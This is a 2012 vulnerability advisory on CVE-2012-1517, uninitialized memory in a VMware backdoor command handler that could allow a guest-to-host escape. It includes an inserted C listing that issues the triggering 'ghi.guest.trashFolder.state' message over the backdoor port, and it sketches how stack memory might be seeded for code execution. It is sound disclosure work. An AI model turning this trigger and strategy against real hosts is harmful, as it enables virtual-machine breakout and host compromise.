VMware Backdoor ghi.guest.trashFolder.state Uninitialized Memory
Posted May 8, 2012
Authored by Derek Soeder

The vulnerability described in this document could hypothetically be exploited by unprivileged code running in a VMware virtual machine (guest) in order to execute code in the host VMX process, thereby breaking out of the virtual machine; however, such exploitation has not been proven.

tags | advisory
advisories | CVE-2012-1517
MD5 | 23a15e8e5f4e8c749191a128067b6a74

VMware Backdoor ghi.guest.trashFolder.state Uninitialized Memory
Potential VM Break

Derek Soeder
ds.adv.pub@gmail.com

Reported: December 5, 2011
Published: May 3, 2012


AFFECTED VENDOR
---------------
VMware, Inc.


AFFECTED ENVIRONMENTS
---------------------
The following VMware product versions are known to be affected:
VMware Workstation 7.0.0
VMware Workstation 7.1.5 and earlier
VMware Player 3.1.5 and earlier
VMware ESXi 4.1.0 Update 2 Build 502767 and earlier
Other related versions not tested due to unavailability


UNAFFECTED ENVIRONMENTS
-----------------------
VMware Server 1.0.x
VMware Server 2.0.x
VMware Workstation 8.0.x
VMware Player 4.0.x
VMware ESXi 3.5.0
VMware ESXi 4.0.0
VMware ESXi 5.0.0
Other related versions not tested due to unavailability


IDENTIFIERS
-----------
CVE-2012-1517


IMPACT
------
The vulnerability described in this document could hypothetically be
exploited by unprivileged code running in a VMware virtual machine
(guest) in order to execute code in the host VMX process, thereby
breaking out of the virtual machine; however, such exploitation has
not been proven.


VULNERABILITY DETAILS
---------------------
The VMware backdoor interface consists of a number of operations
issued via I/O instructions executed in the guest with a command
number in CX and data or "magic" values in a number of other
registers. Command 0x1E / 30 (BDOOR_CMD_MESSAGE) and its subcommands
(MESSAGE_TYPE_*) allow messages to be exchanged between the guest and
host.
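The register-level shape of such an exchange, as an added example that is not part of the advisory and not VMware's code: it encodes the guest-side frames for opening an RPCI channel over BDOOR_CMD_MESSAGE and sending one command string, using the constants published in open-vm-tools (backdoor_def.h, guest_msg_def.h). The I/O step is a function pointer so the frames can be captured and inspected outside a virtual machine; the inline-assembly transport only does anything inside a VMware guest with I/O privilege. The mock host, its channel id 3 and its cookie values are constructed for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BDOOR_MAGIC              0x564D5868u  /* "VMXh", in EAX */
#define BDOOR_PORT               0x5658u      /* low 16 bits of EDX */
#define BDOOR_CMD_MESSAGE        30u          /* low 16 bits of ECX */
#define MESSAGE_TYPE_OPEN        0u           /* subcommand: high 16 bits of ECX */
#define MESSAGE_TYPE_SENDSIZE    1u
#define MESSAGE_TYPE_SENDPAYLOAD 2u
#define MESSAGE_TYPE_CLOSE       6u
#define RPCI_PROTOCOL_NUM        0x49435052u  /* 'RPCI': guest-to-host RPC */
#define GUESTMSG_FLAG_COOKIE     0x80000000u
#define MESSAGE_STATUS_SUCCESS   0x0001u      /* host status: high 16 bits of ECX */

typedef struct { uint32_t eax, ebx, ecx, edx, esi, edi; } bdoor_regs;
typedef void (*bdoor_io)(bdoor_regs *r);    /* one IN on port 0x5658 */
typedef struct { uint16_t id; uint32_t cookie_hi, cookie_lo; } rpc_channel;

#if defined(__GNUC__) && (defined(__i386__) || defined(__x86_64__))
/* Real transport: only meaningful inside a VMware guest with I/O privilege. */
void bdoor_in(bdoor_regs *r)
{
    __asm__ __volatile__("inl %%dx, %%eax"
        : "+a"(r->eax), "+b"(r->ebx), "+c"(r->ecx), "+d"(r->edx),
          "+S"(r->esi), "+D"(r->edi) : : "memory");
}
#endif

#define HOST_OK(r) (((r)->ecx >> 16) & MESSAGE_STATUS_SUCCESS)

static void frame_init(bdoor_regs *r, uint32_t type, const rpc_channel *ch)
{
    memset(r, 0, sizeof *r);
    r->eax = BDOOR_MAGIC;
    r->ecx = (type << 16) | BDOOR_CMD_MESSAGE;
    r->edx = BDOOR_PORT;
    if (ch) {                                /* channel id and cookie name the session */
        r->edx |= (uint32_t)ch->id << 16;
        r->esi = ch->cookie_hi; r->edi = ch->cookie_lo;
    }
}

static int rpc_open(bdoor_io io, rpc_channel *ch)
{
    bdoor_regs r;
    frame_init(&r, MESSAGE_TYPE_OPEN, NULL);
    r.ebx = RPCI_PROTOCOL_NUM | GUESTMSG_FLAG_COOKIE;
    io(&r);
    if (!HOST_OK(&r)) return -1;
    ch->id = (uint16_t)(r.edx >> 16);        /* assigned by the host */
    ch->cookie_hi = r.esi; ch->cookie_lo = r.edi;
    return 0;
}

/* SENDSIZE frame, then the bytes four at a time in EBX (little-endian, last
 * chunk zero padded). Returns frames issued, or -1 if the host refused one. */
static int rpc_send(bdoor_io io, const rpc_channel *ch, const char *msg, size_t len)
{
    bdoor_regs r; int frames = 0;
    frame_init(&r, MESSAGE_TYPE_SENDSIZE, ch);
    r.ebx = (uint32_t)len;
    io(&r); frames++;
    if (!HOST_OK(&r)) return -1;
    for (size_t off = 0; off < len; off += 4) {
        uint32_t chunk = 0;
        for (size_t i = 0; i < 4 && off + i < len; i++)
            chunk |= (uint32_t)(unsigned char)msg[off + i] << (8 * i);
        frame_init(&r, MESSAGE_TYPE_SENDPAYLOAD, ch);
        r.ebx = chunk;
        io(&r); frames++;
        if (!HOST_OK(&r)) return -1;
    }
    return frames;
}

/* Mock host for off-VM use (constructed, not VMware code): records each frame
 * as the guest issued it, answers success, and on OPEN hands out channel 3. */
#define MAX_FRAMES 32
static bdoor_regs captured[MAX_FRAMES];
static size_t ncaptured;
static void mock_host(bdoor_regs *r)
{
    uint32_t type = r->ecx >> 16;
    if (ncaptured < MAX_FRAMES) captured[ncaptured++] = *r;
    r->ecx = (MESSAGE_STATUS_SUCCESS << 16) | BDOOR_CMD_MESSAGE;
    if (type == MESSAGE_TYPE_OPEN) { r->edx = (3u << 16) | BDOOR_PORT; r->esi = 0xAAAA; r->edi = 0xBBBB; }
}

/* Open, send one command string, close. Returns the total number of frames. */
static int send_command(bdoor_io io, const char *cmd)
{
    rpc_channel ch; bdoor_regs r; int n;
    if (rpc_open(io, &ch) < 0) return -1;
    n = rpc_send(io, &ch, cmd, strlen(cmd));
    frame_init(&r, MESSAGE_TYPE_CLOSE, &ch);
    io(&r);
    return n < 0 ? -1 : n + 2;
}
```

Calling send_command(mock_host, "ghi.guest.trashFolder.state") produces ten frames: one OPEN, one SENDSIZE carrying 27, seven SENDPAYLOAD chunks and one CLOSE; substituting bdoor_in for mock_host inside a guest issues the same sequence against the real VMX. The host dispatcher, not the guest, decides where the command name ends and the arguments begin, which is why the bare command string matters for the handler discussed below.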

Messages from the guest take the form of a command string followed by
any number of arguments. When the guest issues a command message, the
command dispatcher in the host VMX process calls a handler function
associated with the given command that is prototyped roughly as
follows:

bool __cdecl CommandHandler(
    void * unknown,
    short channel,
    char * args,
    unsigned int args_len,
    char * * preply,
    unsigned int * preply_len)

The handler for the "ghi.guest.trashFolder.state" command, available
in newer versions of VMware products, checks for an empty argument
string by comparing 'args' to null and 'args_len' to zero, and if
either matches, the function fails with the error message "Invalid
parameters". However, this particular failure path skips a call that
initializes a local variable, an XDR structure. Before the handler
function returns--even in the event of failure--it retrieves the
'x_ops' pointer from the structure at offset +0x04 (32-bit) / +0x08
(64-bit), which points to a table of function pointers, and it then
calls the eighth function pointer, 'x_destroy', at offset +0x1C
(32-bit) / +0x38 (64-bit) within the table.


EXPLOITATION
------------
Since the stack memory that constitutes the structure remains
uninitialized when the handler function processes a
"ghi.guest.trashFolder.state" command with no arguments, the guest
could hypothetically proffer an arbitrary function pointer table
pointer by first causing some other operation to be performed by the
thread that will execute the handler function, thereby seeding that
portion of stack memory. Successful exploitation would then depend on
being able to find or establish a useful function pointer table and
code to execute.

At least on a Windows host, procurement of a function pointer table
might be facilitated by the fact that the VMX executable cannot be
relocated. Furthermore, the VMX process often features PAGE_READWRITE
mappings of guest physical memory at predictable addresses. It might
also be possible to fill the VMX process's heap by issuing other
backdoor commands.


MITIGATION
----------
None known.


CONCLUSION
----------
This document discloses a vulnerability in more recent versions of
VMware products that could potentially allow a guest to execute
arbitrary code on the host system, although an unsuccessful
exploitation attempt will likely crash the guest.

The exploitability of this vulnerability is most contingent on the
ability to control the contents of the relevant, uninitialized stack
memory from the guest, which has not yet been demonstrated. If that
proves to be possible, eventual reliable exploitation should be
considered likely.


GREETINGS
---------
www.ftmband.com
www.ridgewayis.com
